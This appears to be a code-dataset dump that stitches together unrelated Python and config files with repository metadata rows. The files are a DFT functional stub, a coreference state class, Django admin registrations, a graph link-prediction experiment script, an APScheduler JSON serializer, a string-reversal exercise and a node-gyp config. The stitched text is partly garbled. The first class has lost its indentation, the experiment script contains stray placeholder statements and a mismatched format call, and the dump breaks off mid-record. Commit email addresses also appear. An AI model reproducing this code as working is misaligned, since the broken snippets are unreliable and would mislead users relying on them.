from pyscf import dft,lib,scf
import numpy as np
import kernel
class CF():
def __init__(self, mol, kskernel):
#for the integration grid
self.min_y = 0.0
self.max_y = 100.0
self.gauleg_deg = 2000
self.y_grid, self.y_weights = np.polynomial.legendre.leggauss(self.gauleg_deg)
self.y_values = 0.5 * (self.y_grid + 1) * (self.max_y - self.min_y) + self.min_y
self.y_weights = self.y_weights * 0.5*(self.max_y - self.min_y)
self.y_values_power = {1:self.y_values, 2:self.y_values**2, 3:self.y_values**3,
4:self.y_values**4, 5:self.y_values**5, 6:self.y_values**6}
@property
def CalculateMomentJXE(self, n, JX, E):
return NotImplementedError('Subclass specialization')
@property
def CalculateA(self, rs, zeta):
return NotImplementedError('Subclass specialization')
@property
def CalculateB(self, rs, zeta):
return NotImplementedError('Subclass specialization')
@property
def CalculateC(self, JX, A, B, E):
return NotImplementedError('Subclass specialization')
@property
def SolveE(self, E, rho , kf, epsilonXC, JX, A, B):
return NotImplementedError('Subclass specialization')
@property
def CalculateE(self, rho, kf, epsilonXC, JX, A, B):
return NotImplementedError('Subclass specialization')
@property
def CalculateCD(self, rho, kf, eps_xc, JX, A, B, E):
return NotImplementedError('Subclass specialization')
@property
def CalculateTotalXC(self, params_up = None, params_down = None):
return NotImplementedError('Subclass specialization')
|
[
"rodrigobogossian@gmail.com"
] |
rodrigobogossian@gmail.com
|
b6d65b733fa93e683f912e595de20b6d50ba81bc
|
d02727d818c369e4ad13489788458b2a19a593f1
|
/models/searn/state.py
|
ff62372ceb07bc18254584b842df9c06b2c608e9
|
[] |
no_license
|
artemkramov/coreference-pairs
|
cbe299b6d71ebc945abaaa4fbbb4196b6145ebe2
|
8fab8e13b039cf0ccd68dcab6b394dd71d555ff9
|
refs/heads/master
| 2021-06-26T06:42:04.631865
| 2019-08-16T14:18:50
| 2019-08-16T14:18:50
| 174,178,363
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,463
|
py
|
from .mention import Mention
import uuid
from typing import List
from .action import MergeAction, PassAction, Action
from .policy import Policy
import copy
# State of mentions
class State:
# Index of the current mention in the list of mentions
current_mention_idx = 1
# Index of the current antecedent in the list of mentions
current_antecedent_idx = 0
clusters = []
def __init__(self, _clusters):
self.clusters = _clusters
def get_cluster_id(self, mention_id):
return self.clusters[mention_id]
# Get cluster with mentions where the given mention is located
def get_cluster_by_id(self, mention_cluster_id: str, mentions: List[Mention]) -> List[Mention]:
if mention_cluster_id is None:
return []
cluster = []
for idx, cluster_id in enumerate(self.clusters):
if cluster_id == mention_cluster_id:
cluster.append(mentions[idx])
return cluster
def get_siblings_of_mention(self, mention_id):
cluster = []
mention_cluster_id = self.get_cluster_id(mention_id)
for idx, cluster_id in enumerate(self.clusters):
if cluster_id == mention_cluster_id:
cluster.append(idx)
return cluster
def get_cluster_of_mention(self, mention_id, mentions):
mention_cluster_id = self.get_cluster_id(mention_id)
return self.get_cluster_by_id(mention_cluster_id, mentions)
|
[
"github@help-micro.com.ua"
] |
github@help-micro.com.ua
|
ad90ac3c023bc1b2ebd8f09634fcd8803d5f884b
|
438d6a867e23e49fe84041d1dcb3456b71af8ebb
|
/Modulos/inventario/admin.py
|
0d4c470169a2b07ef45fe28d9c943d06b7366daf
|
[] |
no_license
|
Nicko1722/inventario-is
|
76d0108ecd2e01843c60292d80f6c27c39f53faa
|
b7ed35de235673ad896ffdcefcf6d6c9c08501c5
|
refs/heads/master
| 2021-01-01T03:56:34.485005
| 2016-04-24T21:35:07
| 2016-04-24T21:35:07
| 56,994,494
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 483
|
py
|
from django.contrib import admin
from .models import Producto, Provedor, Categoria
# Register your models here.
@admin.register(Categoria)
class CategoriaAdmin(admin.ModelAdmin):
list_display = ['id', 'nombre']
@admin.register(Provedor)
class ProvedorAdmin(admin.ModelAdmin):
list_display = ['id', 'nombre']
@admin.register(Producto)
class ProductoAdmin(admin.ModelAdmin):
list_display = ['id', 'nombre', 'categoria',
'provedor', 'unidades']
|
[
"ioswxd@gmail.com"
] |
ioswxd@gmail.com
|
398f6493189033c8b14eac236ef7b803d54b45f7
|
a882da51d61cd6ab92581d178b7b97726f3381a8
|
/ppl/apps/mdb/mdb_macros/css/__init__.py
|
b36792bba276c9a4076f35650622034fdbc85676
|
[] |
no_license
|
sheldonGal/ppl-polls-project
|
52733ab76b29404e3beef39b2f6159ba0f6a45f3
|
9078fdee96c5852ede8b25ac28c9b8ec1ef98294
|
refs/heads/master
| 2020-05-19T10:14:21.570023
| 2019-05-13T15:53:02
| 2019-05-13T15:53:02
| 184,966,882
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 34
|
py
|
from .text_color import text_color
|
[
"sheldon.gal.nb@gmail.com"
] |
sheldon.gal.nb@gmail.com
|
ec185ea92c21539da1a1068e7e43354f7fe4e2de
|
17d30f314ba07706c473ced6f1ed48b5c5b74cd5
|
/link_prediction/main_tmp.py
|
bc6daf19fbe5849aab58e508513e606b90cd7a34
|
[] |
no_license
|
galkampel/Link_prediction
|
e0c924cc41fa6f34de42d8b35632340e67b7c11a
|
6f6a4316c4eb8bb276205d8bee78b78f6a4f8b79
|
refs/heads/master
| 2020-06-28T22:57:29.225756
| 2019-08-03T21:22:24
| 2019-08-03T21:22:24
| 200,364,076
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 23,398
|
py
|
# import networkx as nx
from graph import Graph
from preprocess import Preprocess
# from node2vec import Node2vec
from walker import DeepWalker #,expand_node
from nodeEmbeddings import *
from model import Model
from edge2vec import *
from splitter import Splitter
from community import CommunityNetwork #,get_graph_stats
from file2obj import save_to_gzip,read_gzip_object,convert_file2obj,save_str,save_res_to_csv #,save_vec_to_HDF5,read_vec_from_HDF5,save_to_csv,read_csv_params
from time import time
from itertools import chain#,product
# from multiprocessing import cpu_count
# import matplotlib.pyplot as plt
import gc
gc.collect()
def create_dateset(data_name,files_name,CD_model,has_communities=True,is_synthetic=False):
#'input_community.json'
if is_synthetic:
params = convert_file2obj('input_syn_community.json')
community_graph = CommunityNetwork(min_num_edges=8)
community_graph.lfr_stats(params)
community_graph.create_lfr(has_communities,params["N"],params["alpha"],params["beta"],params["mu"],params["k_min"],
params["k_max"], params["c_min"],params["c_max"],params["seed"],CD_model)
community_graph.create_between_edges_dict(verbose=True)
save_str(community_graph.get_log(),'graphs/{}_{}_stats.txt'.format(data_name,CD_model))
save_to_gzip(community_graph.get_G(),'{}_{}_{}.gz'.format(data_name,CD_model,files_name[0]))
save_to_gzip(community_graph.get_between_edges_dict(),'{}_{}_{}.gz'.format(data_name,CD_model,files_name[2]))
community_dict = community_graph.get_community_dict()
if has_communities:
save_to_gzip(community_dict,'{}_{}_{}.gz'.format(data_name,CD_model,files_name[1]))
else:
print("new community dict was saved")
save_to_gzip(community_graph.get_communities_n2v_dict(),'{}_{}_{}.gz'.format(data_name,CD_model,files_name[1]))
print('new community dict:\n'.format(community_graph.get_communities_n2v_dict()))
return community_dict
#real data
else:
params = convert_file2obj('input_real_community.json')
community_graph = CommunityNetwork(min_num_edges=6)
community_graph.get_real_data(params['edgelist_file'],params['groups_file'],has_communities,CD_model)
community_graph.create_between_edges_dict()
save_str(community_graph.get_log(),'graphs/{}_{}_stats.txt'.format(data_name,CD_model))
save_to_gzip(community_graph.get_G(),'{}_{}_{}.gz'.format(data_name,CD_model,files_name[0]))
save_to_gzip(community_graph.get_between_edges_dict(),'{}_{}_{}.gz'.format(data_name,CD_model,files_name[2]))
community_dict = community_graph.get_community_dict()
print('community dict has {} keys and {} values'.format(len(community_dict.keys()), np.sum(
len(val) for val in community_dict.values())))
if has_communities:
save_to_gzip(community_dict,'{}_{}_{}.gz'.format(data_name,CD_model,files_name[1]))
else:
print("new community dict was saved")
save_to_gzip(community_graph.get_communities_n2v_dict(),'{}_{}_{}.gz'.format(data_name,CD_model,files_name[1]))
print('new community dict:\n'.format(community_graph.get_communities_n2v_dict()))
return
#create 'a given' graph to predict from
def preprocess_G(data_name,files_name,CD_model,has_communities,community_dict,multiplier,seed = 1,frac_within=0.5,frac_between=0.5):
G = read_gzip_object('{}_{}_{}.gz'.format(data_name,CD_model,files_name[0]))
# community_dict = read_gzip_object('{}_{}_{}.gz'.format(data_name,CD_model,files_name[1]))
between_edges_dict = read_gzip_object('{}_{}_{}.gz'.format(data_name,CD_model,files_name[2]))
print('Start preprocessing...')
#default seed = 1
preprocess = Preprocess(G,community_dict,between_edges_dict,multiplier,frac_within,frac_between,seed = seed)
start = time()
preprocess.set_new_G('{}_{}_{}_{}_{}'.format(data_name,CD_model,int(has_communities),seed,files_name[4]))
print('It took {:.3f} seconds to create new G and test set'.format(time()-start))
start = time()
preprocess.save_train_obj('{}_{}_{}_{}_{}'.format(data_name,CD_model,int(has_communities),seed,files_name[3]))
print('It took {:.3f} seconds to create new training set'.format(time()-start))
save_to_gzip(preprocess.get_G(),'{}_{}_{}_{}_{}.gz'.format(data_name,CD_model,int(has_communities),seed,files_name[0]))
# def partition_community_dict(community_dict,G,data_name,CD_model,seed,thres=10000,to_save=True):
#
# df = pd.DataFrame.from_dict({key:get_graph_stats(G.subgraph(nodes),count_communities=False) for key,nodes in community_dict.items()},
# orient='index',columns = ['nodes','edges','avg degree','r_avg degree','med degree'])
# is_outlier = (((df['r_avg degree'] - df['r_avg degree'].mean()).abs() > 2 * df['r_avg degree'].std())
# & ((df['r_avg degree'] - df['r_avg degree'].mean()).abs() > 2 * df['r_avg degree'].std()))
# c_outlies = df[is_outlier].index.tolist()
# rel_df = df[~is_outlier]
# k_rounded_meds = tuple(rel_df.groupby(['r_avg degree', 'med degree']).groups.keys())
# c_to_parj = {}
# num_edges = 0
# N = len(k_rounded_meds)
# j = 0
# for i,k_rounded_med in enumerate(k_rounded_meds):
# k_rounded,k_med = k_rounded_med
# tmp_df = df[(df['r_avg degree'] == k_rounded) & (df['med degree'] == k_med) ]
# for c in tmp_df.index.tolist():
# c_to_parj[c] = j
#
# num_edges += tmp_df['edges'].sum()
# if num_edges > thres or i == N-1:
# j += 1
# num_edges = 0
#
# for c in c_outlies:
# c_to_parj[c] = j
# j += 1
#
# if to_save:
# df.to_csv("df_{}_{}_{}.csv".format(data_name,CD_model,seed))
# save_to_gzip(c_to_parj,'community_to_partition_{}_{}_{}.gz'.format(data_name,CD_model,seed))
#
# return c_to_parj,j+1
# def node2embeddings(params,data_name,files_name,CD_model,has_communities,community_dict,multiplier,seed):
# # community_dict = read_gzip_object('{}_{}_{}.gz'.format(data_name,CD_model,files_name[1]))
# print('Node2vec phase (graph-wise)')
# graph = Graph()
# graph.read_edgelist('{}_{}_{}_{}_{}.gz'.format(data_name,CD_model,int(has_communities),seed,files_name[0]))
# start = time()
# node2vec = Node2vec(graph.G,params,community_dict,multiplier,size=params["d"],window=params["k"],
# workers=cpu_count())
# print('It took {:.3f} seconds to create nodes representations'.format(time()-start))
# # save_to_gzip(node2vec.get_node2vec(),'{}_{}_{}_{}_{}_{}_{}.gz'.format(data_name,params_str,CD_model,int(has_communities),
# return node2vec.get_node2vec()
# def node2embeddings_community(community_dict,G,params,multiplier,to_expand):#,to_max = False): #is_community_level=False
# #create a community-level node2vec, and then merge all node2vecs to a single dictionary
# # graph = Graph()
# # graph.read_edgelist('{}_{}_{}_{}_{}.gz'.format(data_name,CD_model,int(has_communities),seed,files_name[0]))
# start = time()
# d,k = params["d"],params["k"]
# node2vec = Node2vec(G,params,community_dict,multiplier,is_community_level = True,
# to_expand=to_expand, size=d,window=k,workers=cpu_count())
# print('It took {:.3f} seconds to create nodes representations'.format(time()-start))
# return node2vec.get_node2vec()
# def edge2community_edge(data,is_within):
# if is_within:
# within_pos_edges = list((expand_node(link[0],c),expand_node(link[1],c) )
# for c,links in data['pos']['within'].items() for link in links)
# within_neg_edges = list((expand_node(link[0],c),expand_node(link[1],c) )
# for c,links in data['neg']['within'].items() for link in links)
# return within_pos_edges,within_neg_edges
# else:
# between_pos_edges = list((expand_node(link[0],c1),expand_node(link[1],c2) )
# for (c1,c2),links in data['pos']['between'].items() for link in links)
# between_neg_edges = list((expand_node(link[0],c1),expand_node(link[1],c2) )
# for (c1,c2),links in data['neg']['between'].items() for link in links)
# return between_pos_edges,between_neg_edges
def create_train_test(model,data_obj,bin_op,dim): #,is_community_level = False,to_expand = False
# if is_community_level and to_expand:
# within_pos_edges,within_neg_edges = edge2community_edge(data_obj,is_within=True)
# between_pos_edges,between_neg_edges = edge2community_edge(data_obj,is_within=False)
# data_within_pos = model.edge2vec(within_pos_edges,bin_op,dim,True)
# data_within_neg = model.edge2vec(within_neg_edges,bin_op,dim,False)
# data_within = merge_edges(data_within_pos,data_within_neg)
# data_between_pos = model.edge2vec(between_pos_edges,bin_op,dim,True)
# data_between_neg = model.edge2vec(between_neg_edges,bin_op,dim,False)
# data_between = merge_edges(data_between_pos,data_between_neg)
# return data_within,data_between
# else:
data_within_pos = model.edge2vec(list(chain(*data_obj['pos']['within'].values())),bin_op,dim,True)
data_within_neg = model.edge2vec(list(chain(*data_obj['neg']['within'].values())),bin_op,dim,False)
data_within = {'pos':data_within_pos,'neg': data_within_neg}
data_between_pos = model.edge2vec(list(chain(*data_obj['pos']['between'].values())),bin_op,dim,True)
data_between_neg = model.edge2vec(list(chain(*data_obj['neg']['between'].values())),bin_op,dim,False)
data_between = {'pos':data_between_pos,'neg': data_between_neg}
return data_within,data_between
#create 2 datasets: one for within edges, and the other for between edges
#using Hadamard because it was the best binary operator according to the article
def nodes2edge(vectors,files_name,CD_model,data_name,seed,
has_communities,to_diff_links): #params_str, to_expand=False
train_obj = read_gzip_object('{}_{}_{}_{}_train.gz'.format(data_name,CD_model,int(has_communities),seed,files_name[3]))
test_obj = read_gzip_object('{}_{}_{}_{}_{}.gz'.format(data_name,CD_model,int(has_communities),seed,files_name[4]))
# vectors = read_gzip_object('{}_{}_{}_{}_{}_{}_{}.gz'.format(data_name,params_str,CD_model,int(has_communities),
# int(is_community_level),seed,files_name[-2]))
print("start converting nodes to edges")
d = list(vectors.values())[0].shape[0]
model = Edge2vec(vectors)
start = time()
train_within,train_between = create_train_test(model,train_obj,Hadamard,d)
test_within,test_between = create_train_test(model,test_obj,Hadamard,d)
print('It takes {:.3f} seconds to create edge embeddings'.format(time() - start))
train = {'within': train_within, 'between': train_between}
test = {'within': test_within, 'between': test_between}
# save 4 datasets (within/between for train/test)
if to_diff_links:
#create a link embeddings using a classifier and saving sate dictionary of the embeddings network
splitter = Splitter()
splitter.set_within_between_sep(train_within['pos'],train_between['pos'])
return train,test
def link_prediction(model_name,to_diff_links,is_multiclass,seed,
train_dict,test_dict,model_params_path ,params_str,output):
model_params = convert_file2obj(model_params_path)
model = Model(model_params,to_diff_links,is_multiclass,seed)
if model_name == 'Logistic Regression' or model_name == 'xgboost':
model.get_measures(train_dict,test_dict,output,model_name,params_str)
else:
model.get_MLP_measures(train_dict,test_dict,output,params_str)
#has_communities:
# if 0 then need to use community detection algorithm to create communities
#CD_model:
# 0 if no need of CD algorithm, 1 for multilevel, 2 for infomap and 3 for label propagation
#is_community_level:
# 1 if community-level based node2vec should be created else (0) graph-level
# two types of prediction:
# type '1' - ignore community knowledge
# type '2' - differentiate between within and between community links
# def exe_n2v(files_name,num_to_save,data_name,CD_model,model_name,to_diff_links,is_multiclass,
# has_communities, multiplier,seed,seed_trainings,all_params,model_params_path=None):
#
# # all_params = convert_file2obj('all_params_tmp.json')
# all_params["workers"] = cpu_count()
# output = []
# header = ["p","q","d","r","l","k","F1 within","AP within","Accuracy within","AUC within","F1 between","AP between",
# "Accuracy between","AUC between","F1 total","AP total","Accuracy total","AUC total","params"]
# output.append(header)
# counter = 1
# pqs, d, r, ls, ks = list(all_params.values())[:5]
# to_read_n2v_dict = all_params["to_read_n2v_dict"]
# to_save_n2v_dict = all_params["to_save_n2v_dict"]
# all_combinations = [(pq[0],pq[1],d,r,l,k) for pq in pqs for l in ls for k in ks if l > k]
# community_dict = read_gzip_object('{}_{}_{}.gz'.format(data_name, CD_model, files_name[1]))
# community_dict = {c:[str(u) for u in nodes] for c,nodes in community_dict.items()}
# for seed_training in seed_trainings:
# for cand_param in all_combinations:
# p,q,d,r,l,k = cand_param
# params = {"p": p,"q": q, "d":d,"r":r,"l":l,"k":k,"workers":all_params["workers"]}
# n2v_params = list(params.values())[:-1]
# print("Node2vec parameters: {}".format(params))
# params_str = "_".join("{}={}".format(key,val) for key,val in params.items() if key !='workers')
# n2v_dict = None
# if to_read_n2v_dict:
# n2v_dict = read_gzip_object('n2v_dict_{}_{}_{}_{}.gz'.format(data_name,params_str,int(has_communities),seed))
# else:
# n2v_dict = node2embeddings(params,data_name,files_name,CD_model,has_communities,community_dict,multiplier,seed)
# if to_save_n2v_dict:
# save_to_gzip(n2v_dict,'n2v_dict_{}_{}_{}_{}.gz'.format(data_name,params_str,int(has_communities),seed))
# print('finished creating node2vec')
#
#
# train_dict,test_dict = nodes2edge(n2v_dict,files_name,CD_model,data_name,seed,has_communities)
# link_prediction(model_name,to_diff_links,is_multiclass,seed_training,
# train_dict,test_dict,model_params_path,n2v_params,output)
# if counter % num_to_save == 0:
# save_res_to_csv(int(counter / num_to_save),data_name,CD_model,has_communities,
# to_diff_links,is_multiclass,seed,seed_training,model_name,output)
# output = []
# output.append(header)
# counter += 1
# if len(output) > 1:
# if counter % num_to_save == 0:
# counter = int(counter / num_to_save)
# else:
# counter = int(counter / num_to_save) + 1
# save_res_to_csv(counter,data_name,CD_model,has_communities,to_diff_links,
# is_multiclass,seed,seed_training,model_name,output)
# counter = 1
# output = []
# output.append(header)
# return
def config_to_str(config):
str_config = "("
N = len(config)
for i in range(N):
if i < N-1:
str_config +="{},".format(config[i])
else:
str_config +="{}".format(config[i])
str_config += ")"
return str_config
def exe(files_name,method,num_to_save,data_name,CD_model,model_name,to_diff_links,is_multiclass,
has_communities, multiplier,seed,seed_trainings,n2embedd_params,model_params_path=None):
output = []
header = ["Method","Method_params","F1 within", "AP within", "Accuracy within",
"AUC within", "F1 between","AP between","Accuracy between", "AUC between",
"F1 total", "AP total","Accuracy total", "AUC total", "params"]
# to_read_embed_dict = all_params["to_read_embed_dict"]
to_save_embed_dict = False #n2embedd_params["to_save_embed_dict"]
output.append(header)
community_dict = read_gzip_object('{}_{}_{}.gz'.format(data_name, CD_model, files_name[1]))
community_dict = {c: [str(u) for u in nodes] for c, nodes in community_dict.items()}
graph = Graph()
graph.read_edgelist('{}_{}_{}_{}_{}.gz'.format(data_name, CD_model, int(has_communities), seed, files_name[0]))
#which node2embedding to execute
node_embeddings = None
counter = 1
config_name,configs = None,None
if method == "ELMo":
configs = n2embedd_params["scalar_mix_parameters"]
config_name = "scalar_mix_parameters"
if to_save_embed_dict:
set_sentences_node2idx(graph.G,n2embedd_params,seed)
node_embeddings = get_ElmoEmbeddings
elif method == "ComE":
2
#ComE
else:
#M-NMF
23
for seed_training in seed_trainings:
for config in configs:
params_str = "_".join( "{}={}".format(key, val) for key, val in n2embedd_params.items()
if key != config_name and key != "sentences" and key != "nodes2idx")
params_str += "{}={}".format(config_name,config_to_str(config))
pre_measures = [method,params_str]
vectors = None
if to_save_embed_dict:
start = time()
vectors = node_embeddings(graph.G,n2embedd_params,config)
print('it took {:.3f} seconds to create node embeddings dict'.format(time()-start))
save_to_gzip(vectors,'vectors_{}.gz'.format(params_str))
print('save nodes representation dict\nContiue..')
continue
else: #to read dict
vectors = read_gzip_object('vectors_{}.gz'.format(params_str))
train_dict, test_dict = nodes2edge(vectors, files_name, CD_model, data_name, seed, has_communities,to_diff_links)
link_prediction(model_name, to_diff_links, is_multiclass, seed_training,
train_dict, test_dict, model_params_path, pre_measures, output)
if counter % num_to_save == 0:
save_res_to_csv(int(counter / num_to_save), data_name, CD_model, has_communities,
to_diff_links, is_multiclass, seed, seed_training, model_name, output)
output = []
output.append(header)
counter += 1
if to_save_embed_dict:
print('finished looping over configs.\nStop execution')
exit()
if len(output) > 1:
if counter % num_to_save == 0:
counter = int(counter / num_to_save)
else:
counter = int(counter / num_to_save) + 1
save_res_to_csv(counter, data_name, CD_model, has_communities, to_diff_links,
is_multiclass, seed, seed_training, model_name, output)
counter = 1
output = []
output.append(header)
def set_sentences_node2idx(G,params,seed):
walker = DeepWalker(G)
start = time()
walker.preprocess_transition_probs()
print('it took {:.3f} seconds to create transition probs'.format(time()-start))
sentences, nodes2idx = walker.simulate_walks(params["num_walks"],params["walk_length"])
params["sentences"] = sentences
params["nodes2idx"] = nodes2idx
def get_ElmoEmbeddings(G,params,scalar_mix_parameters):
elmo = ElmoEmbeddings(scalar_mix_parameters,params["num_output_representations"],params["dropout"],
params["requires_grad"])
elmo.set_ELMO_embeddings(params["sentences"])
print('finished creating embeddings')
return elmo.get_vectors(params["nodes2idx"])
# def get_all_params(best_all_params):
# d = {}
# for params in best_all_params.values():
# for param,val in params.items():
# d.setdefault(param,[]).append(val)
# return list(d.values())
# def set_directed_G(G):
# G = G.to_directed()
# nx.set_edge_attributes(G,values=1,name='weight')
# G = nx.relabel_nodes(G, lambda x: str(x))
# return G
#
# def get_r_d_k_rho(best_all_params):
# params = list(best_all_params.values())[0]
# return params["r"],params["d"],params["k"],params["rho"]
#
# def plot_rhos(rhos,val_rhos,params_str):
# plt.xlabel("rho")
# plt.xlim(0,1)
# plt.xticks(np.arange(0.0, 1.1, step=0.1))
# plt.ylabel("accuracy")
# plt.title("validation accuracy with different rhos")
# plt.plot(rhos,val_rhos)
# plt.savefig('plots_rho/{}.png'.format(params_str))
# plt.close()
## l > k , p <= q
#d = 128, r = 10, l = 80, k = 10
# d = 64,128 p,q= 0.25,0.5,1,2 r = 10,12,14 l= 10,30,50,80 k = 10,12,14,16
if __name__ == '__main__':
input_params = convert_file2obj('input_params.json')
data_name =input_params["data_name"]
has_communities = input_params["has_communities"]
CD_model = input_params["CD_model"]
multiplier = 1
if data_name == "Flickr":
multiplier = 5
if has_communities:
CD_model = 0
all_params = None
# to_expand = None
# to_intertwine = None
to_diff_links = input_params["to_diff_links"]
is_multiclass = input_params["is_multiclass"]
model_params_path = input_params["model_params_path"]
method = input_params["method"]
all_params = convert_file2obj('{}_params.json'.format(method))
model_params = convert_file2obj(model_params_path)
model_name = input_params["model_name"]
seed = input_params["seed"]
seed_trainings = input_params["seed_trainings"]
is_synthetic = input_params["is_synthetic"]
has_community_dict = input_params["has_community_dict"]
files_name = ['graph','community_dict','between_dict','train','test','embeddings','log']
# if not has_community_dict:
# create_dateset(data_name,files_name,CD_model,has_communities=has_communities,is_synthetic=is_synthetic)
# exit()
# else:
# community_dict = read_gzip_object('{}_{}_{}.gz'.format(data_name, CD_model, files_name[1]))
# preprocess_G(data_name,files_name,CD_model,has_communities,community_dict,multiplier,seed,frac_within=0.5,frac_between=0.5)
# print('Finish preprocessing.\nQuit execution!!')
# exit()
num_to_save = 1
counter = 1
ouptput = None
exe(files_name,method,num_to_save,data_name,CD_model,model_name,to_diff_links,is_multiclass,
has_communities,multiplier,seed,seed_trainings,all_params,model_params_path)
|
[
"noreply@github.com"
] |
galkampel.noreply@github.com
|
aaa0a6007ed8d3e408f2f48673605bab85e04bdf
|
fd6976d9773fc56f5af47fbd1f9d366feffc777f
|
/apscheduler/serializers/json.py
|
7c2513bba0a7fa1681b8b67ad676fca413342254
|
[
"MIT"
] |
permissive
|
daya0576/apscheduler
|
f4678077ddf9b2cb7f72d6c8b82178b34547b21a
|
61b8b44c712c9a28e613044b12c553adbc6ca015
|
refs/heads/master
| 2023-05-31T19:57:46.824631
| 2021-07-10T16:19:52
| 2021-07-10T16:19:52
| 384,734,462
| 0
| 0
|
MIT
| 2021-07-10T15:49:31
| 2021-07-10T15:49:30
| null |
UTF-8
|
Python
| false
| false
| 1,529
|
py
|
from dataclasses import dataclass, field
from json import dumps, loads
from typing import Any, Dict
from ..abc import Serializer
from ..marshalling import marshal_object, unmarshal_object
@dataclass
class JSONSerializer(Serializer):
magic_key: str = '_apscheduler_json'
dump_options: Dict[str, Any] = field(default_factory=dict)
load_options: Dict[str, Any] = field(default_factory=dict)
def __post_init__(self):
self.dump_options['default'] = self._default_hook
self.load_options['object_hook'] = self._object_hook
@classmethod
def _default_hook(cls, obj):
if hasattr(obj, '__getstate__'):
cls_ref, state = marshal_object(obj)
return {cls.magic_key: [cls_ref, state]}
raise TypeError(f'Object of type {obj.__class__.__name__!r} is not JSON serializable')
@classmethod
def _object_hook(cls, obj_state: Dict[str, Any]):
if cls.magic_key in obj_state:
ref, *rest = obj_state[cls.magic_key]
return unmarshal_object(ref, *rest)
return obj_state
def serialize(self, obj) -> bytes:
return dumps(obj, ensure_ascii=False, **self.dump_options).encode('utf-8')
def deserialize(self, serialized: bytes):
return loads(serialized, **self.load_options)
def serialize_to_unicode(self, obj) -> str:
return dumps(obj, ensure_ascii=False, **self.dump_options)
def deserialize_from_unicode(self, serialized: str):
return loads(serialized, **self.load_options)
|
[
"alex.gronholm@nextday.fi"
] |
alex.gronholm@nextday.fi
|
967192b03f1c16e356fd0b8218bcfbc2e0b8ef5c
|
aa09302c7186025af42c22664bb291395bee9bae
|
/lecode/Reverse String.py
|
cda659cb35dbde8a177a6e4f7b738f48824bdae1
|
[] |
no_license
|
okliou/_test
|
b7fdf801548d33498d2053ed71436853b8e18003
|
45dbe55a727769ffe10b2e6b92ab5097fbc3d8cc
|
refs/heads/master
| 2020-06-16T23:50:53.180458
| 2019-07-10T11:29:55
| 2019-07-10T11:29:55
| 195,733,624
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 420
|
py
|
class Solution:
def reverseString(self, s: list) -> None:
"""
Do not return anything, modify s in-place instead.
"""
for i in range(len(s) // 2):
print(s[i], s[- i - 1])
s[i], s[- i - 1] = s[- i - 1], s[i]
print(s[i], s[- i - 1], '-'*20)
return s
if __name__ == '__main__':
print(Solution().reverseString(["H","a","n","n","a","h"]))
|
[
"okliou@163.com"
] |
okliou@163.com
|
42ff9cc6a926214d8a0a1716f91c5a6cbe4d476f
|
507b25ae0a75752d5cc5d97fd1f1e95ef55bd70e
|
/todo/node_modules/mongoose/node_modules/mongodb/node_modules/mongodb-core/node_modules/kerberos/build/config.gypi
|
0ab330031f1b6e4d0cf85c246d9d0e4e12bb6326
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
Anne0011/ToDo-List
|
86a2dcb60947c68db29b1c43adf7502243d0a201
|
5e2d8d853763577de3329dba17c2384a9b063eb5
|
refs/heads/master
| 2021-01-19T20:27:46.182524
| 2015-04-16T23:23:00
| 2015-04-16T23:23:00
| 33,787,973
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,241
|
gypi
|
# Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 1,
"host_arch": "x64",
"node_install_npm": "false",
"node_prefix": "/usr/local/Cellar/node/0.10.33_1",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"openssl_no_asm": 0,
"python": "/usr/local/opt/python/bin/python2.7",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "true",
"want_separate_host_toolset": 0,
"nodedir": "/Users/tammygrose/.node-gyp/0.10.33",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"save_dev": "",
"browser": "",
"viewer": "man",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"init_author_url": "",
"shell": "/bin/zsh",
"parseable": "",
"shrinkwrap": "true",
"init_license": "ISC",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"fetch_retries": "2",
"npat": "",
"registry": "https://registry.npmjs.org/",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"spin": "true",
"cache_lock_retries": "10",
"cafile": "",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"proprietary_attribs": "true",
"json": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/tammygrose/.npm-init.js",
"userconfig": "/Users/tammygrose/.npmrc",
"node_version": "0.10.33",
"user": "",
"editor": "vi",
"save": "",
"tag": "latest",
"global": "",
"optional": "true",
"bin_links": "true",
"force": "",
"searchopts": "",
"depth": "Infinity",
"rebuild_bundle": "true",
"searchsort": "name",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"strict_ssl": "true",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"save_exact": "",
"cache_lock_stale": "60000",
"version": "",
"cache_min": "10",
"cache": "/Users/tammygrose/.npm",
"searchexclude": "",
"color": "true",
"save_optional": "",
"user_agent": "npm/2.1.12 node/v0.10.33 darwin x64",
"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"init_version": "1.0.0",
"umask": "18",
"git": "git",
"init_author_name": "",
"scope": "",
"onload_script": "",
"tmp": "/var/folders/4y/xw1pwxgs2w7379s7smy0j4yh0000gn/T",
"unsafe_perm": "true",
"prefix": "/usr/local",
"link": ""
}
}
|
[
"anne.grose68@gmail.com"
] |
anne.grose68@gmail.com
|
101df5215cadd59cef70267543b752ad01970845
|
a682c44945f2c98f7ec6ef846d51753a5b802aca
|
/modules/__init__.py
|
